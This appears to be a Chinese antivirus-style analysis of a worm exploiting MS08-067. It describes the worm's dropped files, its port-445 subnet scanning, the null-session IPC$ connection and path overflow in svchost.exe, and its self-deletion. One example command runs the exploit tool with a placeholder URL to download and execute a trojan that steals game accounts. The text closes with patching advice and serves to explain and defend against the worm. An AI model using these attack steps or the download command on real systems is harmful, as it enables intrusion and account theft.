1. 释放病毒体

　　病毒运行后释放以下文件：

　　aaa.bat,

　　mrosconfig.exe

　　vista.exe

　　qqq.sys

　　其中aaa.bat控制整个病毒的运行流程。

　　2. 扫描网内计算机

　　首先调用vista.exe对本网段(C类)范围内的所有计算机的445端口进行扫描。之后，挑选出可以连上445端口的计算机保存到一个列表文件中。

　　3. 攻击在线的计算机（有漏洞的会出现现象或中毒）

　　然后，病毒调用mrosconfig.exe对列表文件中的计算机发送RPC请求，使远程计算机中的svchost.exe中解析RPC路径时溢出，在远程计算机中下载并执行http://xxx.xxx.com/down/ko.exe。

　　mrosconfig.exe是一个实现下载者功能的远程溢出利用工具, 对应的命令行为：

　　mrosconfig.exe 要攻击的计算机的IP 要在远程下载的病毒的url

　　如：

　　mrosconfig.exe 127.0.0.1 http://xxx.xxx.com/down/ko.exe

　　具体的步骤如下：

　　(1). 使用空用户、空密码连接上远程计算机上的IPC$共享。

　　(2). 向连上的计算机发送远程路径".a....NN"。如果远程计算机上未修复ms08-067漏洞，那么svchost.exe调用NetpwPathCanonicalize函数解析此路径时会溢出，从而执行远程路径后的指令。

　　(3). 溢出指令下载附在指令后的url对应的文件到远程计算机上，并运行此文件。

　　(4). 下载的文件是一个木马下载者，该下载者还会下载其他的木马程序安装到被攻击的计算机上。已知会下载的木马程序包括：机器狗木马下载器，QQ三国、完美系列网游等游戏盗号器。

　　如果攻击失败，则远程计算机会出现’SVCHOST.exe’出错的提示。只有这个现象是用户可见的。

　　如果用户反映这个问题，则可以认为其所在的局域网内有机器中毒，但自身没有中。打上补丁就可以避免。

　　4. 自删除病毒体

　　删除释放的mrosconfig.exe，vista.exe，qqq.sys，aaa.bat。